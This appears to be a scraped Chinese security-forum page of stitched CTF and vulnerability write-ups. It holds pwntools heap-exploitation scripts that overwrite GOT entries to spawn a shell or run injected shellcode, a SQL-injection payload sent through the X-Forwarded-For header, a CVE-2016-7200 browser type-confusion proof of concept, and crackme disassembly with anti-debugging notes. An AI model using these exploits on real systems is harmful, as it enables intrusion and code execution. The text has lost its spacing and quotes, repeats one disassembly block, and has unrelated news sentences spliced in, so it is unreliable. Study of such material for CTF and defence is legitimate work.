):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit(),MMPFN结构体表示了该数据库中的每一个独立条目,它包含了单一物理页的信息。运行,OD附加前往401000,看着挺像处理代码的下断运行,输入sn后断下(运气挺好)这个应该是初始化luabytecode(看后面字符串,功能应该是xor)0040103D885C2436movbyteptrss:[esp+36],bl0040104188442437movbyteptrss:[esp+37],al00401045C644243807movbyteptrss:[esp+38],70040104A885C2439movbyteptrss:[esp+39],bl...初始化的栈信息0012FA4E0010927C0000000000001B4C4A02023B.抾......LJ;0012FA5E00020700030009360200003902010236....6..960012FA6E03000039030203120400001205010012..9...0012FA7E06010042030400430200000873756209.B.C.. string.0012FA9E00050175360100003901010112020000.u6..9..0012FAAE42010202080100005801028029010000B..X)..0012FABE4C010200360102003901030136020400L.6.96.0012FACE12030000290401004202030229037000..).B)6.96.0012FAEE12040000290502004203030229046500..).B)6.96.0012FB0E12050000290603004204030229056400..).B)6.96.0012FB2E12060000290704004205030229066900..).B)6.96.0012FB4E12070000290805004206030229077900..).B)6.96.0012FB6E12080000290906004207030229083100..)..B)6.96.0012FB8E12090000290A07004208030229093200...)..B).6.96..0012FBAE120A0000290B080042090302290A3300...) .B.).6..9..6..0012FBCE120B0000290C0900420A0302290B3400 ..)...B.) 6..9..6 .0012FBEE120C0000290D0A00420B0302290C3500...)...B ).6 .9  6..0012FC0E120D0000290E0B00420C0302290D3600...) .B.). 6..9..6..0012FC2E120E0000290F0C00420D0302290E3700..)..B.)....0012FC4E12100400121105001212060012130700....0012FC5E121408001215090012160A0012170B00..... .0012FC6E12180C004A0D0D000762790962786F72..J...bitlen string0012FC8E3D030002000600083600000027010100=...6....0012FC9E42000201330002003700030033000400B.3..7..3..0012FCAE370005004B000100096D61696E0007627..K...main.b0012FCBE7900086269740C726571756972650002y.0012FCCE0000FE55F9EAEBD15D00313233343536..㑳胙].1234560012FCDE00000000000000000000000000000000................0012FCEE00000000000000000000000000000000................0012FCFE00000000000000000000000000000000................lua初始化,43Cleaeax,dwordptrss:[esp+3C],380040220E85C0testeax,每个字符(恩,虽然是猜的,但是后面证明猜对了)lua_xor(sn[i])xor05120A2942417561358355940040222C55pushebp00,eax004022376AF5push-0B0040223956pushesi0040223A83F705xoredi,,eax004022446AF6push-0A0040224656pushesi0040224783F312xorebx,,eax004022516AF7push-90040225356pushesi0040225483F50Axorebp,,290040225F6AF8push-80040226156pushesi0040226289442458movdwordptrss:[esp+58],,420040226E6AF9push-70040227056pushesi0040227189442448movdwordptrss:[esp+48],,410040227D6AFApush-60040227F56pushesi0040228089442460movdwordptrss:[esp+60],,750040228C6AFBpush-50040228E56pushesi0040228F89442460movdwordptrss:[esp+60],,400040229B83F061xoreax,610040229E6AFCpush-4004022A056pushesi004022A189442418movdwordptrss:[esp+18],,35004022AD6AFDpush-3004022AF56pushesi004022B089442424movdwordptrss:[esp+24],,83004022BE6AFEpush-2004022C056pushesi004022C189442434movdwordptrss:[esp+34],,55004022CD6AFFpush-1004022CF56pushesi004022D089442444movdwordptrss:[esp+44],,94结果必须为:18161E2F4811213733865294004022F383FF18cmpedi,18004022F67554jnzshort0040234C004022F883FB16cmpebx,16004022FB754Fjnzshort0040234C004022FD83FD1Ecmpebp,1E00402300754Ajnzshort0040234C00402302837C24302Fcmpdwordptr[esp+30],2F004023077543jnzshort0040234C00402309837C241848cmpdwordptr[esp+18],480040230E753Cjnzshort0040234C00402310837C242811cmpdwordptr[esp+28],11004023157535jnzshort0040234C00402317837C242021cmpdwordptr[esp+20],210040231C752Ejnzshort0040234C0040231E837C241037cmpdwordptr[esp+10],37004023237527jnzshort0040234C00402325837C241433cmpdwordptr[esp+14],330040232A7520jnzshort0040234C0040232C817C241C86000cmpdwordptr[esp+1C],86004023347516jnzshort0040234C00402336837C242452cmpdwordptr[esp+24],520040233B750Fjnzshort0040234C0040233D817C242C94000cmpdwordptr[esp+2C],94004023457505jnzshort0040234C004023478D47E9leaeax,dwordptr[edi-17]0040234AEB02jmpshort0040234E0040234C33C0xoreax,eax没看lua代码,直接试了下voidtest(){BYTEkey1[12];//123456789012BYTEbuf1[12]={0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0x31,0x32};//call00412CE0的结果BYTEbuf2[12]={0x41,0x57,0x57,0x5D,0x4C,0x07,0x05,0x0B,0x0D,0x05,0x07,0x05};BYTEkey2[12]={0x05,0x12,0x0A,0x29,0x42,0x41,0x75,0x61,0x35,0x83,0x55,0x94};BYTEexpected[12]={0x18,0x16,0x1E,0x2F,0x48,0x11,0x21,0x37,0x33,0x86,0x52,0x94};for(inti=0;i12;i++){key1[i]=buf1[i]^buf2[i];}BYTEsn[13]={0};for(inti=0;i12;i++){sn[i]=key1[i]^key2[i]^expected[i];}printf(%s,sn);}maposafe2017...【阅读全文】
pjj | 2018-2-7 | 阅读(767) | 评论(623)
这道题还是比较简单,只是加了点反调试(关闭和禁用前台窗口,设置线程来禁止调试事件).分析见注释:00F520A0/$55pushebp00F520A1|.8BECmovebp,esp00F520A3|.6AFEpush-200F520A5|.684044F700push00F7444000F520AA|.68F0D6F500push00F5D6F0入口点00F520AF|.64:A100000000moveax,fs:[0]00F520B5|.50pusheax00F520B6|.83EC14subesp,1400F520B9|.A1DC65F700moveax,[0F765DC]00F520BE|.3145F8xor[ebp-8],eax00F520C1|.33C5xoreax,ebp00F520C3|.8945E4mov[ebp-1C],eax00F520C6|.53pushebx00F520C7|.56pushesi00F520C8|.57pushedi00F520C9|.50pusheax00F520CA|.8D45F0leaeax,[ebp-10]00F520CD|.64:A300000000movfs:[0],eax00F520D3|.E888FEFFFFcall00F51F60//调用反调试程序,关闭和禁用前台窗口(如被调试,前台窗口是调试器窗口)00F520D8|.3BF4cmpesi,esp00F520DA|.E8B1FCFFFFcall00F51D90[,//输出"password:",并读取输入SN00F520DF|.8BF0movesi,eax00F520E1|.3BF5cmpesi,ebp00F520E3|.C745DC54727573movdwordptr[ebp-24],7375725400F520EA|.C745E0744D6500movdwordptr[ebp-20],654D7400F520F1|.8D45DCleaeax,[ebp-24]00F520F4|.50pusheax/Arg200F520F5|.56pushesi|Arg100F520F6|.E8353E0000call00F55F30\,//strstr(SN,"TrustMe")00F520FB|.83C408addesp,800F520FE|.85C0testeax,eax00F52100|.-7507jnzshort00F5210900F52102|.8BCEmovecx,esi//SN中必须有"TrustMe",否则提示"error!"00F52104|.E887FDFFFFcall00F51E9000F52109|682438F700push00F73824/Procname="ZwSetInformationThread"00F5210E|.683C38F700push00F7383C|/FileName=""00F52113|.8B3D20D0F600movedi,[0F6D020]||00F52119|.FFD7calledi|\|.50pusheax|hModule00F5211C|.8B1D24D0F600movebx,[0F6D024]|00F52122|.FFD3callebx\|.8BF0movesi,eax00F52126|.6A00push000F52128|.6A00push000F5212A|.6A11push11//ThreadHideFromDebugger,禁止调试事件00F5212C|.FF151CD0F600call[0F6D01C][|.50pusheax00F52133|.FFD6callesi//CallZwSetInformationThread,禁止调试事件00F52135|.C745FC00000000movdwordptr[ebp-4],000F5213C|.A138D1F600moveax,[0F6D138]00F52141|.A34C8CF700mov[0F78C4C],eax00F52146|.C745FCFEFFFFFFmovdwordptr[ebp-4],-200F5214D|.E821000000call00F52173[|.A14C8CF700moveax,[0F78C4C]00F52157|.3B0540D1F600cmpeax,[0F6D140]00F5215D|.-7535jneshort00F5219400F5215F|.6A00push0;/ExitCode=000F52161|.FF1514D0F600call[0F6D014]\|.8B1D24D0F600movebx,[0F6D024]00F5216D|.8B3D20D0F600movedi,[0F6D020]00F52173|$682438F700push00F73824ASCII"ZwSetInformationThread"00F52178|.683C38F700push00F7383CUNICODE""00F5217D|.FFD7calledi00F5217F|.50pusheax00F52180|.FFD3callebx00F52182|.8BF0movesi,eax00F52184|.6A00push000F52186|.6A00push000F52188|.6A11push11//ThreadHideFromDebugger,禁止调试事件00F5218A|.FF151CD0F600call[0F6D01C][|.50pusheax00F52191|.FFD6callesi//CallZwSetInformationThread,禁止调试事件00F52193|.C3retn00F52194|E847FEFFFFcall00F51FE0//判断后8位是否为"20161018",是,则返回1表示成功00F52199|.85C0testeax,eax00F5219B|.-7432jzshort00F521CF00F5219D|.6A09push9;//注册码为"TrustMe20161018",则提示成功00F5219F|.E8FB300000call00F5529F00F521A4|.C70073756363movdwordptr[eax],6363757300F521AA|.C7400465737321movdwordptr[eax+4],2173736500F521B1|.C6400800movbyteptr[eax+8],000F521B5|.8BD0movedx,eax00F521B7|.E8D4120000call00F53490[|.50pusheax00F521BD|.E8BE170000call00F5398000F521C2|.685038F700push00F73850ASCII"pause"00F521C7|.E8E43F0000call00F561B000F521CC|.83C40Caddesp,0C00F521CF|33C0xoreax,eax00F521D1|.8B4DF0movecx,[ebp-10]00F521D4|.64:890D00000000movfs:[0],ecx00F521DB|.59popecx00F521DC|.5Fpopedi00F521DD|.5Epopesi00F521DE|.5Bpopebx00F521DF|.8B4DE4movecx,[ebp-1C]00F521E2|.33CDxorecx,ebp00F521E4|.E8B6340000call00F5569F00F521E9|.8BE5movesp,ebp00F521EB|.5Dpopebp00F521EC\.C3retn关闭,禁用窗口的反调试:00F51F60$,[ebp-4],[0F6D01C][[0F6D018][,eax00F51F7C.-修改段寄存器00F51F7FE8dbE800F51F80/.5Fpopedi00F51F81|.5Epopesi00F51F82|.5Bpopebx00F51F83|.8BE5movesp,ebp00F51F85|.5Dpopebp00F51F86\.,[0F775E0]入口点00F51F8F.-EB02jmpshort00F51F9300F51F91E8dbE800F51F9279db79chary,[0F78C60]//[ebp-4],,,[0F775E0]入口点,0FABEE9000F51FAF.-7502jneshort00F51FB300F51FB1E8dbE800F51FB279db79chary00F51FB3/FF75FCpushdwordptr[ebp-4]00F51FB6|.0315648CF700addedx,[0F78C64]00F51FBC|.FFD2calledx//SendMessageWWM_DESTROY关闭前台窗口,如果开着调试器,调试器就退出了00F51FBE|.61popad00F51FBF|.6A00push0;/Enable=FALSE00F51FC1|.FF75FCpushdwordptr[ebp-4]|hWnd,//禁用前台窗口00F51FC4|.FF1548D1F600call[0F6D148]\|.5Fpopedi00F51FCB|.5Epopesi00F51FCC|.5Bpopebx00F51FCD|.8BE5movesp,ebp00F51FCF|.5Dpopebp00F51FD0\.C3retn后8位判断:00F51FE0/$55pushebp00F51FE1|.8BECmovebp,esp00F51FE3|.83E4F8andesp,FFFFFFF8;qword(8-字节)堆栈对齐方式00F51FE6|.83EC1Csubesp,1C00F51FE9|.A1DC65F700moveax,[0F765DC]00F51FEE|.33C4xoreax,esp00F51FF0|.89442418mov[esp+18],eax00F51FF4|.8B15588CF700movedx,[0F78C58]ASCII"12345678"00F51FFA|.56pushesi00F51FFB|.C74424180F00000movdwordptr[esp+18],0F00F52003|.C74424140000000movdwordptr[esp+14],000F5200B|.803A00cmpbyteptr[edx],000F5200E|.C644240400movbyteptr[esp+4],000F52013|.-7504jneshort00F5201900F52015|.33C9xorecx,ecx00F52017|.-EB10jmpshort00F5202900F52019|8BCAmovecx,edx00F5201B|.8D7101leaesi,[ecx+1]00F5201E|.8BFFmovedi,edi00F52020|8A01/moval,[ecx]00F52022|.41|incecx00F52023|.84C0|testal,al00F52025|.-75F9\jnzshort00F5202000F52027|.2BCEsubecx,esi00F52029|51pushecx00F5202A|.52pushedx00F5202B|.8D4C240Cleaecx,[esp+0C]00F5202F|.E8BC070000call00F527F000F52034|.837C24140Fcmpdwordptr[esp+14],0F;//判断SN长度,一定要15位00F52039|.-7524jneshort00F5205F00F5203B|.A1588CF700moveax,[0F78C58]ASCII"12345678"00F52040|.83C007addeax,700F52043|.50pusheax/Arg1,//后8位转数字00F52044|.A3588CF700mov[0F78C58],eax|00F52049|.E845410000call00F56193\,//atoi00F5204E|.83C404addesp,400F52051|.3DFAA13301cmpeax,133A1FA//比较SN后8位是否为十进制2016101800F52056|.-7507jneshort00F5205F00F52058|.BE01000000movesi,1//后8位为"20161018",返回100F5205D|.-EB02jmpshort00F5206100F5205F|33F6xoresi,esi00F52061|837C241810cmpdwordptr[esp+18],1000F52066|.-720Cjbshort00F5207400F52068|.FF742404pushdwordptr[esp+4]/Arg100F5206C|.E85F440000call00F564D0\|.83C404addesp,400F52074|8B4C241Cmovecx,[esp+1C]00F52078|.8BC6moveax,esi00F5207A|.5Epopesi00F5207B|.33CCxorecx,esp00F5207D|.E81D360000call00F5569F00F52082|.8BE5movesp,ebp00F52084|.5Dpopebp00F52085\.C3retn漏洞证明在留言处,设置XFF为X-Forwarded-For:1,content),(,0,2,1513505345,version(),content21)#,如下所示:访问guest_成功地显示出数据库的版本号。,通过下面两个请求的uri可以泄露账号和密码,美国网件系列默认用户名admin(二)着力打造具有地域特色荷文化把发掘、传承、弘扬、光大荷文化底蕴作为示范区建设发展主线,不断推进荷文化建设,让传统荷文化保持旺盛的生命力。...【阅读全文】
vd3 | 2018-2-7 | 阅读(746) | 评论(781)
(完)相关链接:客流高峰集中在2月12日至15日、2月17日至23日和2月27日至3月3日三个时段。,利用思路利用cheat在chunk中放置shellcode,修改got指向chunk中的shellcode相关结构体structx_acc{__int64field_0;charusername[16];charpassword[16];x_character*character;};structx_character{charname[16];__int64health;__int64stamina;__int64weight;__int64location;x_item*item_head;};structx_cheat_st{charname[16];charcontent[32];};structx_chunk{__int64ref_count;__int64size;chardata[1];};structx_item{__int64id;__int64weight;__int64count;x_item*next;__int64bullet;__int64power;};脚本###=Truefrompwnimport*importsysimporttimeimportrecontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./pwn7)ifargs[LOCAL]:io=process(./pwn7)else:io=remote(,8888)sc="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"defcmd_signup(username,password,character_name):(Signup==============================)(2)(inputyourusername)(username)(inputyourpassword)(password)(inputyourcharacter\sname)(character_name)()returndefcmd_login(username,password):(Signup==============================)(1)(Inputyourusername:)(username)(Inputyourpassword:)(password)returndefcmd_exit():()(0)returndefcmd_show():()(1)(===============================)(==============================)returndefcmd_item_enter():()(2)returndefcmd_item_leave():(YourChoice:)(str(-1))(wrongchoice)returndefcmd_item_view(id):(YourChoice:)(str(id))data=()(2)returndatadefcmd_item_delete(id):(YourChoice:)(str(id))()(1)data=()(2)returndatadefcmd_goto(location):()(3)()(str(location))returndefcmd_explore(l):()(4)(Youfind:)s=(2)ifs==no:(found)returns+=(0)(Doyouwanttopickupit)ifsinl:(y)else:(n)s=returnsdefcmd_explore_until_success(l):while1:item_name=cmd_explore(l)print(pickup:%s%item_name)ifnot(item_name==):(item_name)(1)returndefcmd_cheat(first,name,content):()(5)iffirst==1:(name:)(name)(content:)(content)else:(content:)(content)returndefexploit():username=a*8password=b*8character_name=c*8cmd_signup(username,password,character_name)cmd_login(username,password)#cmd_show()cmd_goto(1)cmd_cheat(1,x*8,y*0x18)#pickup2differentitemsl=[98k,S12K,AKM,M16A4,UMP45,SKS,M416,M24,Bandage,Drink,FirstAidKit]cmd_explore_until_success(l)cmd_explore_until_success(l)#deleteoneitem(initfreelist)cmd_item_enter()data=cmd_item_delete(1)cmd_item_leave()#(io)#input()#putfakepointerinitem2buf=buf+=z*0x40#item1(freed)#item2headerbuf+=p64(1)#ref_countbuf+=p64(0x18)#size#item2buf+=p64([memcmp])#id(fakepointer)buf+=p64(0)#weightbuf+=p64(1)#countbuf+=p64(0)#nextbuf+=p64(0)#bulletbuf+=p64(0)#power#freelistbuf+=p64(0)#ref_countbuf+=p64(0x20)#sizebuf+=p64(0)buf+=p64(0)cmd_cheat(0,x*8,y*0x20+buf)#overwritetargetwithfreelist+0x10cmd_item_enter()data=cmd_item_delete(1)cmd_item_leave()#copyshellcodetofreelist+0x10buf=buf+=z*0xA0buf+=sccmd_cheat(0,x*8,y*0x20+buf)cmd_exit()#triggermemcmp(callshellcode)cmd_login(username,password)()returnexploit()flag{Cr4k4ndH4ckF0rFunG00dLuck2o17}Payload:要注入的DLL在网上搜索了一些关于DLL注入的资料,发现都没有被注入的DLL的实现,这里首先占用少量篇幅来说明DLL的实现。...【阅读全文】
rdf | 2018-2-7 | 阅读(935) | 评论(727)
CVE-2016-7200标签(空格分隔):ChakraPOCclassdummy{constructor(){return[1,2,3];}}classMyArrayextendsArray{staticget[](){returndummy;}}vara=newMyArray({},[],"natalie",7,7,7,7,7);functiontest(i){returntrue;}varo=(test);调试boolSparseArraySegmentT::IsMissingItem(constT*value){return*value==SparseArraySegmentT::GetMissingItem();}其中左值为0x0000000200000001,右值为0x8000000280000002value实际指向ArraySegment,其中length=3,size=6,元素为1、2、30x00000170823BC5100000000000000003........0x00000170823BC5180000000600000000........0x00000170823BC5200000000000000000........0x00000170823BC5280000000100000002........0x00000170823BC5300000000380000002.......\n0x00000170823BC5388000000280000002......\n对应于poc中定义的(test);会调用()filter()方法创建一个新数组,其包含通过所提供函数实现的测试的所有元素。这道题还是比较简单,只是加了点反调试(关闭和禁用前台窗口,设置线程来禁止调试事件).分析见注释:00F520A0/$55pushebp00F520A1|.8BECmovebp,esp00F520A3|.6AFEpush-200F520A5|.684044F700push00F7444000F520AA|.68F0D6F500push00F5D6F0入口点00F520AF|.64:A100000000moveax,fs:[0]00F520B5|.50pusheax00F520B6|.83EC14subesp,1400F520B9|.A1DC65F700moveax,[0F765DC]00F520BE|.3145F8xor[ebp-8],eax00F520C1|.33C5xoreax,ebp00F520C3|.8945E4mov[ebp-1C],eax00F520C6|.53pushebx00F520C7|.56pushesi00F520C8|.57pushedi00F520C9|.50pusheax00F520CA|.8D45F0leaeax,[ebp-10]00F520CD|.64:A300000000movfs:[0],eax00F520D3|.E888FEFFFFcall00F51F60//调用反调试程序,关闭和禁用前台窗口(如被调试,前台窗口是调试器窗口)00F520D8|.3BF4cmpesi,esp00F520DA|.E8B1FCFFFFcall00F51D90[,//输出"password:",并读取输入SN00F520DF|.8BF0movesi,eax00F520E1|.3BF5cmpesi,ebp00F520E3|.C745DC54727573movdwordptr[ebp-24],7375725400F520EA|.C745E0744D6500movdwordptr[ebp-20],654D7400F520F1|.8D45DCleaeax,[ebp-24]00F520F4|.50pusheax/Arg200F520F5|.56pushesi|Arg100F520F6|.E8353E0000call00F55F30\,//strstr(SN,"TrustMe")00F520FB|.83C408addesp,800F520FE|.85C0testeax,eax00F52100|.-7507jnzshort00F5210900F52102|.8BCEmovecx,esi//SN中必须有"TrustMe",否则提示"error!"00F52104|.E887FDFFFFcall00F51E9000F52109|682438F700push00F73824/Procname="ZwSetInformationThread"00F5210E|.683C38F700push00F7383C|/FileName=""00F52113|.8B3D20D0F600movedi,[0F6D020]||00F52119|.FFD7calledi|\|.50pusheax|hModule00F5211C|.8B1D24D0F600movebx,[0F6D024]|00F52122|.FFD3callebx\|.8BF0movesi,eax00F52126|.6A00push000F52128|.6A00push000F5212A|.6A11push11//ThreadHideFromDebugger,禁止调试事件00F5212C|.FF151CD0F600call[0F6D01C][|.50pusheax00F52133|.FFD6callesi//CallZwSetInformationThread,禁止调试事件00F52135|.C745FC00000000movdwordptr[ebp-4],000F5213C|.A138D1F600moveax,[0F6D138]00F52141|.A34C8CF700mov[0F78C4C],eax00F52146|.C745FCFEFFFFFFmovdwordptr[ebp-4],-200F5214D|.E821000000call00F52173[|.A14C8CF700moveax,[0F78C4C]00F52157|.3B0540D1F600cmpeax,[0F6D140]00F5215D|.-7535jneshort00F5219400F5215F|.6A00push0;/ExitCode=000F52161|.FF1514D0F600call[0F6D014]\|.8B1D24D0F600movebx,[0F6D024]00F5216D|.8B3D20D0F600movedi,[0F6D020]00F52173|$682438F700push00F73824ASCII"ZwSetInformationThread"00F52178|.683C38F700push00F7383CUNICODE""00F5217D|.FFD7calledi00F5217F|.50pusheax00F52180|.FFD3callebx00F52182|.8BF0movesi,eax00F52184|.6A00push000F52186|.6A00push000F52188|.6A11push11//ThreadHideFromDebugger,禁止调试事件00F5218A|.FF151CD0F600call[0F6D01C][|.50pusheax00F52191|.FFD6callesi//CallZwSetInformationThread,禁止调试事件00F52193|.C3retn00F52194|E847FEFFFFcall00F51FE0//判断后8位是否为"20161018",是,则返回1表示成功00F52199|.85C0testeax,eax00F5219B|.-7432jzshort00F521CF00F5219D|.6A09push9;//注册码为"TrustMe20161018",则提示成功00F5219F|.E8FB300000call00F5529F00F521A4|.C70073756363movdwordptr[eax],6363757300F521AA|.C7400465737321movdwordptr[eax+4],2173736500F521B1|.C6400800movbyteptr[eax+8],000F521B5|.8BD0movedx,eax00F521B7|.E8D4120000call00F53490[|.50pusheax00F521BD|.E8BE170000call00F5398000F521C2|.685038F700push00F73850ASCII"pause"00F521C7|.E8E43F0000call00F561B000F521CC|.83C40Caddesp,0C00F521CF|33C0xoreax,eax00F521D1|.8B4DF0movecx,[ebp-10]00F521D4|.64:890D00000000movfs:[0],ecx00F521DB|.59popecx00F521DC|.5Fpopedi00F521DD|.5Epopesi00F521DE|.5Bpopebx00F521DF|.8B4DE4movecx,[ebp-1C]00F521E2|.33CDxorecx,ebp00F521E4|.E8B6340000call00F5569F00F521E9|.8BE5movesp,ebp00F521EB|.5Dpopebp00F521EC\.C3retn关闭,禁用窗口的反调试:00F51F60$,[ebp-4],[0F6D01C][[0F6D018][,eax00F51F7C.-修改段寄存器00F51F7FE8dbE800F51F80/.5Fpopedi00F51F81|.5Epopesi00F51F82|.5Bpopebx00F51F83|.8BE5movesp,ebp00F51F85|.5Dpopebp00F51F86\.,[0F775E0]入口点00F51F8F.-EB02jmpshort00F51F9300F51F91E8dbE800F51F9279db79chary,[0F78C60]//[ebp-4],,,[0F775E0]入口点,0FABEE9000F51FAF.-7502jneshort00F51FB300F51FB1E8dbE800F51FB279db79chary00F51FB3/FF75FCpushdwordptr[ebp-4]00F51FB6|.0315648CF700addedx,[0F78C64]00F51FBC|.FFD2calledx//SendMessageWWM_DESTROY关闭前台窗口,如果开着调试器,调试器就退出了00F51FBE|.61popad00F51FBF|.6A00push0;/Enable=FALSE00F51FC1|.FF75FCpushdwordptr[ebp-4]|hWnd,//禁用前台窗口00F51FC4|.FF1548D1F600call[0F6D148]\|.5Fpopedi00F51FCB|.5Epopesi00F51FCC|.5Bpopebx00F51FCD|.8BE5movesp,ebp00F51FCF|.5Dpopebp00F51FD0\.C3retn后8位判断:00F51FE0/$55pushebp00F51FE1|.8BECmovebp,esp00F51FE3|.83E4F8andesp,FFFFFFF8;qword(8-字节)堆栈对齐方式00F51FE6|.83EC1Csubesp,1C00F51FE9|.A1DC65F700moveax,[0F765DC]00F51FEE|.33C4xoreax,esp00F51FF0|.89442418mov[esp+18],eax00F51FF4|.8B15588CF700movedx,[0F78C58]ASCII"12345678"00F51FFA|.56pushesi00F51FFB|.C74424180F00000movdwordptr[esp+18],0F00F52003|.C74424140000000movdwordptr[esp+14],000F5200B|.803A00cmpbyteptr[edx],000F5200E|.C644240400movbyteptr[esp+4],000F52013|.-7504jneshort00F5201900F52015|.33C9xorecx,ecx00F52017|.-EB10jmpshort00F5202900F52019|8BCAmovecx,edx00F5201B|.8D7101leaesi,[ecx+1]00F5201E|.8BFFmovedi,edi00F52020|8A01/moval,[ecx]00F52022|.41|incecx00F52023|.84C0|testal,al00F52025|.-75F9\jnzshort00F5202000F52027|.2BCEsubecx,esi00F52029|51pushecx00F5202A|.52pushedx00F5202B|.8D4C240Cleaecx,[esp+0C]00F5202F|.E8BC070000call00F527F000F52034|.837C24140Fcmpdwordptr[esp+14],0F;//判断SN长度,一定要15位00F52039|.-7524jneshort00F5205F00F5203B|.A1588CF700moveax,[0F78C58]ASCII"12345678"00F52040|.83C007addeax,700F52043|.50pusheax/Arg1,//后8位转数字00F52044|.A3588CF700mov[0F78C58],eax|00F52049|.E845410000call00F56193\,//atoi00F5204E|.83C404addesp,400F52051|.3DFAA13301cmpeax,133A1FA//比较SN后8位是否为十进制2016101800F52056|.-7507jneshort00F5205F00F52058|.BE01000000movesi,1//后8位为"20161018",返回100F5205D|.-EB02jmpshort00F5206100F5205F|33F6xoresi,esi00F52061|837C241810cmpdwordptr[esp+18],1000F52066|.-720Cjbshort00F5207400F52068|.FF742404pushdwordptr[esp+4]/Arg100F5206C|.E85F440000call00F564D0\|.83C404addesp,400F52074|8B4C241Cmovecx,[esp+1C]00F52078|.8BC6moveax,esi00F5207A|.5Epopesi00F5207B|.33CCxorecx,esp00F5207D|.E81D360000call00F5569F00F52082|.8BE5movesp,ebp00F52084|.5Dpopebp00F52085\.C3retn,在讨论GNUhash如何计算单一N,而不是N1和N2时,我做了如下的总结:运行时连接器使用的测试如下:(bloom[N1]BITMASK)==BITMASK;N1应该是简单的N:(bloom[N]BITMASK)==BNITMASK;谢谢你善意的文字。OD载入,输入123456,点确定半天没反应,忽然来个内存异常。...【阅读全文】
hbd | 2018-2-7 | 阅读(275) | 评论(500)
2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。  李新元强调,坚持领导挂帅、高位推动,是全面深化河长制工作的关键。,因为对于客户端来说凡是以HTTP开头的变量都是可控的,不论是通过getenv还是通过$_SERVER方式获取。有3处"sizeof(BloomWord)"的使用应为"sizeof(BloomWord)*8",因为我们处理的是位,而不是字节。...【阅读全文】
jrt | 2018-2-6 | 阅读(684) | 评论(760)
通过分析,下面使用python进行穷举,代码如下:importhashlibimportsysdefhash_md5(src):myMd5=()(src)myMd5_Digest=()returnmyMd5_Digestdefis_ok(v):ifv[2:12]==888aeda4ab:return1return0defdo_md5(src):x=x+=chr(ord(src[0])+1)foriinrange(1,len(src)):x+=chr(ord(src[i])+i)x=hash_md5(hash_md5(x))returnxdefget_sn(str,num):if(num==1):forxinstr:yieldxelse:forxinstr:foryinget_sn(str,num-1):yieldx+yif__name__==__main__:printis_ok(a3888aeda4abba91f31c8e0caae48cb9)#000000x=do_md5(000000)printx[2:12]==fd9e2ddbd6forsninget_sn(0123456789abcdefghijklmnopqrstuvwxyz,6):x=do_md5(sn)ifsn[2:6]==0000:printsnifis_ok(x)==1:printsn=+snbreakOD载入,输入123456,点确定半天没反应,忽然来个内存异常。,  2016年1月,长春华奥汽车制造有限公司从长春迁址更名到贵港。Satori家族重复使用Mirai代码,包括网络扫描器,telnet密码尝试和看门狗禁用(图4)。...【阅读全文】
tfb | 2018-2-6 | 阅读(447) | 评论(689)
这里的newArr的创建操作如下//IfthesourceobjectisanArrayexoticobjectweshouldtr*newObj=ArraySpeciesCreate(obj,0,scriptContext);JavascriptArray*newArr=nullptr;//Ifthenewobjectwecreatedisanarray,rememberthatasitwillsaveustimesettingpropertiesintheobjectbelowif(JavascriptArray::Is(newObj)){newArr=JavascriptArray::FromVar(newObj);}注意虽然进行了转换,但是最后newArr却是NativeIntArray类型=0x000001E353F7C5100x000001E353F7C5100000000000000003........0x000001E353F7C5180000000600000000........0x000001E353F7C5200000000000000000........0x000001E353F7C5280000000100000002........0x000001E353F7C5300000000380000002.......\n0x000001E353F7C5388000000280000002......\n观察接下来的取值和赋值操作可以发现问题for(uint32k=0;klength;k++){if(!pArr-DirectGetItemAtFull(k,element)){continue;}selected=callBackFn-GetEntryPoint()(callBackFn,CallInfo(CallFlags_Value,4),thisArg,element,JavascriptNumber::ToVar(k,scriptContext),pArr);if(JavascriptConversion::ToBoolean(selected,scriptContext)){//Trytofastpathifthereturnobjectisanarrayif(newArr){newArr-DirectSetItemAt(i,element);}...pArr的类型为JavascriptArraynewArr的类型为JavascriptNativeIntArray这里直接从pArr中取出值放入了newArr,很明显是一个类型混淆造成这个混淆的根本原因是设置了staticget[](){returndummy;}导致返回了一个JavascriptNativeIntArray,从而与JavascriptArray造成混淆。Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF